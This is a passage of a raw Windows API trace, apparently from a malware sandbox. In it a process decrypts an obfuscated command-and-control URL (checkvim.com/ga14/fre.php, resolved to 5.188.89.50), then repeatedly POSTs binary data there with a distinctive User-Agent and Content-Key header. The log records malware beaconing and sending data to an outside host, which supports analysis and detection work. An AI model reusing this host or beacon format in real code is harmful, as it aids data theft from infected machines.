() returned 0x840000 [0285.367] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0285.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.367] CryptDecrypt (in: hKey=0x87e3b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0285.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.368] CryptDestroyKey (hKey=0x87e3b0) returned 1 [0285.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.369] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0285.369] GetProcessHeap () returned 0x840000 [0285.369] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0285.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0285.370] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0285.371] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0285.371] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0285.372] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0285.372] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0285.372] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0285.373] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0285.373] GetProcessHeap () returned 0x840000 [0285.373] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0285.373] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0285.373] GetProcessHeap () returned 0x840000 [0285.373] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0285.373] GetProcessHeap () returned 0x840000 [0285.373] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0285.373] GetProcessHeap () returned 0x840000 [0285.373] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0285.373] GetProcessHeap () returned 0x840000 [0285.373] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0285.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.374] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0285.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.381] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0285.386] GetProcessHeap () returned 0x840000 [0285.386] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0285.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.387] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e870) returned 1 [0285.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.388] CryptSetKeyParam (hKey=0x87e870, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0285.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.389] CryptSetKeyParam (hKey=0x87e870, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.389] GetProcessHeap () returned 0x840000 [0285.389] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0285.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.391] CryptDecrypt (in: hKey=0x87e870, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0285.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.391] CryptDestroyKey (hKey=0x87e870) returned 1 [0285.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.392] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0285.392] GetProcessHeap () returned 0x840000 [0285.392] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0285.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0285.393] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0285.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0285.394] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0285.395] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0285.395] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0285.395] GetProcessHeap () returned 0x840000 [0285.395] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0285.395] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0285.397] GetProcessHeap () returned 0x840000 [0285.397] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b38 [0285.397] socket (af=2, type=1, protocol=6) returned 0x468 [0285.397] connect (s=0x468, name=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0285.463] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0285.463] GetProcessHeap () returned 0x840000 [0285.463] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f248 [0285.463] GetProcessHeap () returned 0x840000 [0285.463] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0285.464] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0285.465] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0285.465] GetProcessHeap () returned 0x840000 [0285.465] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0285.465] GetProcessHeap () returned 0x840000 [0285.465] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0285.465] GetProcessHeap () returned 0x840000 [0285.465] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f710 [0285.465] GetProcessHeap () returned 0x840000 [0285.465] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0285.466] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0285.466] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0285.466] GetProcessHeap () returned 0x840000 [0285.466] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0285.466] GetProcessHeap () returned 0x840000 [0285.466] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0285.466] send (s=0x468, buf=0x873a58*, len=237, flags=0) returned 237 [0285.467] send (s=0x468, buf=0x87eb58*, len=159, flags=0) returned 159 [0285.467] GetProcessHeap () returned 0x840000 [0285.467] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0285.467] recv (in: s=0x468, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0285.842] GetProcessHeap () returned 0x840000 [0285.842] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0285.842] GetProcessHeap () returned 0x840000 [0285.842] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0285.842] GetProcessHeap () returned 0x840000 [0285.842] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0285.842] GetProcessHeap () returned 0x840000 [0285.842] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f248 | out: hHeap=0x840000) returned 1 [0285.843] closesocket (s=0x468) returned 0 [0285.879] GetProcessHeap () returned 0x840000 [0285.879] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b38 | out: hHeap=0x840000) returned 1 [0285.879] GetProcessHeap () returned 0x840000 [0285.879] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0285.879] GetProcessHeap () returned 0x840000 [0285.879] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0285.879] GetProcessHeap () returned 0x840000 [0285.879] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0285.879] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x868) returned 0x468 [0285.932] Sleep (dwMilliseconds=0xea60) [0285.977] GetProcessHeap () returned 0x840000 [0285.977] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fe18 [0285.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.978] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0285.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.989] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0285.996] GetProcessHeap () returned 0x840000 [0285.996] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0285.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.997] CryptImportKey (in: hProv=0x86fa40, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6b0) returned 1 [0285.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.998] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0285.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.998] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.998] GetProcessHeap () returned 0x840000 [0285.999] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0285.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.999] CryptDecrypt (in: hKey=0x87e6b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fe18, pdwDataLen=0x19f9a4 | out: pbData=0x87fe18, pdwDataLen=0x19f9a4) returned 1 [0286.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.006] CryptDestroyKey (hKey=0x87e6b0) returned 1 [0286.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.008] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0286.008] GetProcessHeap () returned 0x840000 [0286.008] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0286.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0286.009] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0286.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0286.010] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0286.011] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0286.012] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0286.013] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0286.013] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0286.013] GetProcessHeap () returned 0x840000 [0286.013] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0286.013] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0286.014] GetProcessHeap () returned 0x840000 [0286.014] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0286.014] GetProcessHeap () returned 0x840000 [0286.014] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0286.014] GetProcessHeap () returned 0x840000 [0286.014] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fe18 | out: hHeap=0x840000) returned 1 [0286.014] GetProcessHeap () returned 0x840000 [0286.014] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7e8 [0286.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.016] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0286.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.023] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0286.031] GetProcessHeap () returned 0x840000 [0286.031] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0286.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.032] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0286.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.034] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0286.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.035] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.035] GetProcessHeap () returned 0x840000 [0286.035] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0286.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.036] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7e8, pdwDataLen=0x19f9a4 | out: pbData=0x87f7e8, pdwDataLen=0x19f9a4) returned 1 [0286.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.038] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0286.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.039] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0286.039] GetProcessHeap () returned 0x840000 [0286.039] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0286.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0286.040] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0286.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0286.041] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0286.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0286.045] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0286.045] GetProcessHeap () returned 0x840000 [0286.045] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0286.045] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871510*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0286.049] GetProcessHeap () returned 0x840000 [0286.049] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c58 [0286.049] socket (af=2, type=1, protocol=6) returned 0x46c [0286.049] connect (s=0x46c, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0286.125] FreeAddrInfoW (pAddrInfo=0x871510*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0286.125] GetProcessHeap () returned 0x840000 [0286.125] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0286.125] GetProcessHeap () returned 0x840000 [0286.125] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0286.126] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0286.126] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0286.126] GetProcessHeap () returned 0x840000 [0286.126] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0286.126] GetProcessHeap () returned 0x840000 [0286.126] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0286.126] GetProcessHeap () returned 0x840000 [0286.126] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb48 [0286.127] GetProcessHeap () returned 0x840000 [0286.127] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0286.127] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0286.128] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0286.128] GetProcessHeap () returned 0x840000 [0286.128] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0286.128] GetProcessHeap () returned 0x840000 [0286.128] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0286.128] send (s=0x46c, buf=0x873a58*, len=237, flags=0) returned 237 [0286.128] send (s=0x46c, buf=0x87eb58*, len=159, flags=0) returned 159 [0286.129] GetProcessHeap () returned 0x840000 [0286.129] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0286.129] recv (in: s=0x46c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0286.487] GetProcessHeap () returned 0x840000 [0286.487] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0286.487] GetProcessHeap () returned 0x840000 [0286.487] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0286.487] GetProcessHeap () returned 0x840000 [0286.487] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0286.487] GetProcessHeap () returned 0x840000 [0286.487] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0286.487] closesocket (s=0x46c) returned 0 [0286.488] GetProcessHeap () returned 0x840000 [0286.488] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c58 | out: hHeap=0x840000) returned 1 [0286.488] GetProcessHeap () returned 0x840000 [0286.488] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0286.488] GetProcessHeap () returned 0x840000 [0286.488] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7e8 | out: hHeap=0x840000) returned 1 [0286.488] GetProcessHeap () returned 0x840000 [0286.488] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0286.488] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x838) returned 0x46c [0286.490] Sleep (dwMilliseconds=0xea60) [0286.491] GetProcessHeap () returned 0x840000 [0286.491] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0286.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.492] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0286.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.528] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fdf8) returned 1 [0286.537] GetProcessHeap () returned 0x840000 [0286.537] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0286.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.538] CryptImportKey (in: hProv=0x86fdf8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0286.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.539] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0286.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.541] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.541] GetProcessHeap () returned 0x840000 [0286.541] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0286.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.542] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0286.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.543] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0286.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.544] CryptReleaseContext (hProv=0x86fdf8, dwFlags=0x0) returned 1 [0286.544] GetProcessHeap () returned 0x840000 [0286.544] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0286.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0286.546] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0286.550] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0286.550] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0286.551] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0286.551] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 